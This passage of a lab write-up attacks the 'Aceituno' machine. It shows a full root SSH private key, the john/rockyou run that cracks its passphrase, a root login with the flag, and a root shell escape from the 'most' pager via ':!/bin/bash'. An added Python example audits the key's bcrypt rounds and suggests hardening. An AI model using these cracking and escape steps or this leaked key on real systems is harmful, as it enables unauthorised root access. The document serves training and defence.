Z9oD24zqoiCb7i2fyx1x4lhhL8ioVkLS4qgwFqidxyCe0lG5rfiNIT7pbtoVrB293lTi59
gXDwdKLqbp93X1/jqde768qLn8UtxKIB/paoIHSvzOicYbbLWVmwzO89kk40+pYe/P0Cm4
ZgoxvSNabx46MhposoX5JNKMiIxEuo9EUF9RRWfagULvqOfjQ0Y1xZxudl9qnltr/nt1Yh
vtb3uKjuRBYxRMs1IOpEh3FsrWnxCBWZf+NPSduXARz2RJdGkVl3AAAD0Bo2dp5dV4571T
mpagumFHUfL6q98UCFzizXp87sYF3eSYDNayRN81WpBFA8Ot6j/9ezxJ02s6Pc9ALRkpfZ
KjqbnrFdqU6NRbsdACW+PegayJNHLauxXoRNAC76ixpHS6LySWA+37BpHw5FVz1h9rWBBt
uu4x3DDrmrUem2XsfHeU2lpCwnp9vQOjIZWXPj9/H1t2m4QR6oedEFKV6ymAt6NogGhLq/
rO0P4rrpO987GUPL4LyxddEIyGc3rX5p0drXT8OhS1qRIbWJQekIqwGVzYRdux7IHnTpr3
UbGhjJlwBzo6gC36pu0pGuZsfUTT9qNwF26/tR6ibyMMhFrk0cVVxh6ygD70E3tHdk/KpD
josGMXrAJ+W8yAdPAD1nWJjjhBz9jrBcQVS5VIJjrq8u/o8cNkd304RwFI66oFOMH4gxXW
V8v1qzweGnaGo1feTSjSZHv21I0TT3UECKL4IEXqOouG7MQ+UQyT7hNgau8+thBNj+glK0
FDyg+Qug0KT05ClURpCtZShlHEk6SnHzovXQqN5HbSPb2NiLDcX5MzngOLugLaMddDktyb
GD7BALPS4OIEIUe0CX3llsx4xEyfKT4bNrC+rx0HORcza5Xt90Wr7lBY86ROVOk5PAGje5
IH9V2EkxYpu2Vf1rqw+e659LRNHfsNQvaGj2gsG3PhhEH44SO9K9KHRFO3kMfNe/5DsAlX
Gnl27908uPhjtedhRJr0FiD++BdD7xXBmO/uN/Md61BoPv8w8u0V3FTkv1mCc9TDYhCL7b
gZyhBDa/5vmQ/bI3MOw9OSjwfl748Pl/vZ/gfJjuMDxurjGfeiuGuG5CfUgz3/SKmEw3GL
/LM25wG2EV6jkj3owhGCM69mVBDq1/ARLwzIRgB94OAP7z2uu24K774mN9sCJ/Q5A94op9
/Olvp6FDa8RqAcM9OyQhO/znemxeZgRHSmDV9Tol9/pgtKawJ6tzrymvu+ClvGc1naGDrq
xCQ53mBvTsMf22WgdD4NQcC95qRr3UEWMuG81r0brdqRyiyqgJXRcYg+xbGwioon5lEKAp
koyJSWpfJ+bE0GJQKD43LbCowEpbt2mBzcvjwMeZqQyUk3pQZl/5AAtwz7ErREbICMbJPT
1EKyZjSLvheWCoyxQ4T4ro/bvHQ7X0izWvMB2L5SBEnsXyjZRMibpdut1zm0JCVZmYCObA
WjMe4TFUoy5Jxa3N0jMgAVbxKoyKYo7O6wpcBlChpkHaAJMdMHN9Ystnm/xZukDw3C8fTl
PFMYhpuAN4oyQaZbBxHvrfaTxCeJs=
-----END OPENSSH PRIVATE KEY-----

Crack the key's passphrase and connect over SSH with it:

❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blessed1 (id_rsa)
1g 0:00:00:47 DONE (2025-01-17 00:35) 0.02115g/s 42.65p/s 42.65c/s 42.65C/s melinda..jesusfreak
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh root@192.168.60.156 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux Aceituno 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 28 12:08:02 2024 from 192.168.0.108
root@Aceituno:~# cat root.txt
77750e200ff18510ec52276c8f654fe9
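The "Cost 2 (iteration count) is 16" that john reports is not guessed: the OpenSSH private key format stores the cipher name, the KDF name and the bcrypt salt and round count in clear in the header, ahead of the encrypted part, and 16 rounds with a rockyou-grade passphrase falls in under a minute as the output above shows. The Python below is an added example, not code from the writeup or from OpenSSH, that parses that header from the key printed above (copied verbatim from this page) and from a constructed unencrypted key, and applies a simple policy check; the 64-round threshold is an example value, not an OpenSSH default. From the owner's side the remedy is to generate keys with a higher round count (ssh-keygen's -a option) and a passphrase that is not in a wordlist, and, more importantly, not to leave root's key readable through a sudo-able pager.

```python
import base64
import struct

# The passphrase-protected root key exactly as printed on this page.
PAGE_KEY = """-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAqVNwfIr
sulKah6wYV7i/NAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZLjoCWvQ
XxRgojyRlr6GA6GdrtRBwD5Z5tB7JvdrT2AE0G0uTCcCsaeFEzkPzIehiTSCM74Qra0IFB
Z9oD24zqoiCb7i2fyx1x4lhhL8ioVkLS4qgwFqidxyCe0lG5rfiNIT7pbtoVrB293lTi59
gXDwdKLqbp93X1/jqde768qLn8UtxKIB/paoIHSvzOicYbbLWVmwzO89kk40+pYe/P0Cm4
ZgoxvSNabx46MhposoX5JNKMiIxEuo9EUF9RRWfagULvqOfjQ0Y1xZxudl9qnltr/nt1Yh
vtb3uKjuRBYxRMs1IOpEh3FsrWnxCBWZf+NPSduXARz2RJdGkVl3AAAD0Bo2dp5dV4571T
mpagumFHUfL6q98UCFzizXp87sYF3eSYDNayRN81WpBFA8Ot6j/9ezxJ02s6Pc9ALRkpfZ
KjqbnrFdqU6NRbsdACW+PegayJNHLauxXoRNAC76ixpHS6LySWA+37BpHw5FVz1h9rWBBt
uu4x3DDrmrUem2XsfHeU2lpCwnp9vQOjIZWXPj9/H1t2m4QR6oedEFKV6ymAt6NogGhLq/
rO0P4rrpO987GUPL4LyxddEIyGc3rX5p0drXT8OhS1qRIbWJQekIqwGVzYRdux7IHnTpr3
UbGhjJlwBzo6gC36pu0pGuZsfUTT9qNwF26/tR6ibyMMhFrk0cVVxh6ygD70E3tHdk/KpD
josGMXrAJ+W8yAdPAD1nWJjjhBz9jrBcQVS5VIJjrq8u/o8cNkd304RwFI66oFOMH4gxXW
V8v1qzweGnaGo1feTSjSZHv21I0TT3UECKL4IEXqOouG7MQ+UQyT7hNgau8+thBNj+glK0
FDyg+Qug0KT05ClURpCtZShlHEk6SnHzovXQqN5HbSPb2NiLDcX5MzngOLugLaMddDktyb
GD7BALPS4OIEIUe0CX3llsx4xEyfKT4bNrC+rx0HORcza5Xt90Wr7lBY86ROVOk5PAGje5
IH9V2EkxYpu2Vf1rqw+e659LRNHfsNQvaGj2gsG3PhhEH44SO9K9KHRFO3kMfNe/5DsAlX
Gnl27908uPhjtedhRJr0FiD++BdD7xXBmO/uN/Md61BoPv8w8u0V3FTkv1mCc9TDYhCL7b
gZyhBDa/5vmQ/bI3MOw9OSjwfl748Pl/vZ/gfJjuMDxurjGfeiuGuG5CfUgz3/SKmEw3GL
/LM25wG2EV6jkj3owhGCM69mVBDq1/ARLwzIRgB94OAP7z2uu24K774mN9sCJ/Q5A94op9
/Olvp6FDa8RqAcM9OyQhO/znemxeZgRHSmDV9Tol9/pgtKawJ6tzrymvu+ClvGc1naGDrq
xCQ53mBvTsMf22WgdD4NQcC95qRr3UEWMuG81r0brdqRyiyqgJXRcYg+xbGwioon5lEKAp
koyJSWpfJ+bE0GJQKD43LbCowEpbt2mBzcvjwMeZqQyUk3pQZl/5AAtwz7ErREbICMbJPT
1EKyZjSLvheWCoyxQ4T4ro/bvHQ7X0izWvMB2L5SBEnsXyjZRMibpdut1zm0JCVZmYCObA
WjMe4TFUoy5Jxa3N0jMgAVbxKoyKYo7O6wpcBlChpkHaAJMdMHN9Ystnm/xZukDw3C8fTl
PFMYhpuAN4oyQaZbBxHvrfaTxCeJs=
-----END OPENSSH PRIVATE KEY-----"""

MAGIC = b"openssh-key-v1\x00"
BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
END = "-----END OPENSSH PRIVATE KEY-----"


def _ssh_string(buf, off):
    """Read one length-prefixed SSH string; return (bytes, new offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def key_protection(pem):
    """Return cipher, KDF, bcrypt rounds and key count from the cleartext header."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if lines[0] != BEGIN or lines[-1] != END:
        raise ValueError("not an OpenSSH private key")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("bad magic")
    cipher, off = _ssh_string(blob, len(MAGIC))
    kdf, off = _ssh_string(blob, off)
    kdf_opts, off = _ssh_string(blob, off)
    (nkeys,) = struct.unpack_from(">I", blob, off)
    rounds = None
    if kdf == b"bcrypt":               # kdfoptions = string salt, uint32 rounds
        _salt, o = _ssh_string(kdf_opts, 0)
        (rounds,) = struct.unpack_from(">I", kdf_opts, o)
    return {"cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds, "keys": nkeys}


def assess(info, min_rounds=64):
    """Policy check; min_rounds is an example threshold, not an OpenSSH default."""
    if info["kdf"] == "none":
        return "unencrypted: whoever can read the file can use the key"
    if info["rounds"] is not None and info["rounds"] < min_rounds:
        return f"encrypted with only {info['rounds']} bcrypt rounds; passphrase strength is the only defence"
    return "encrypted with an acceptable work factor"


def _pack(b):
    return struct.pack(">I", len(b)) + b


# Constructed header of an unencrypted key (cipher and KDF 'none') for comparison.
UNENCRYPTED_SAMPLE = "\n".join([
    BEGIN,
    base64.b64encode(MAGIC + _pack(b"none") + _pack(b"none") + _pack(b"") + struct.pack(">I", 1)).decode(),
    END,
])

if __name__ == "__main__":
    for pem in (PAGE_KEY, UNENCRYPTED_SAMPLE):
        info = key_protection(pem)
        print(info, "->", assess(info))
```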

By the end, though, I found a more convenient privilege-escalation route; see most's official manual page:

[Ubuntu Manpage: most - browse or page through a text file](https://manpages.ubuntu.com/manpages/oracular/en/man1/most.1.html#command usage)


Simply press e to edit the file, which appears to invoke a text editor such as vim, then enter :!/bin/bash to get a root shell.
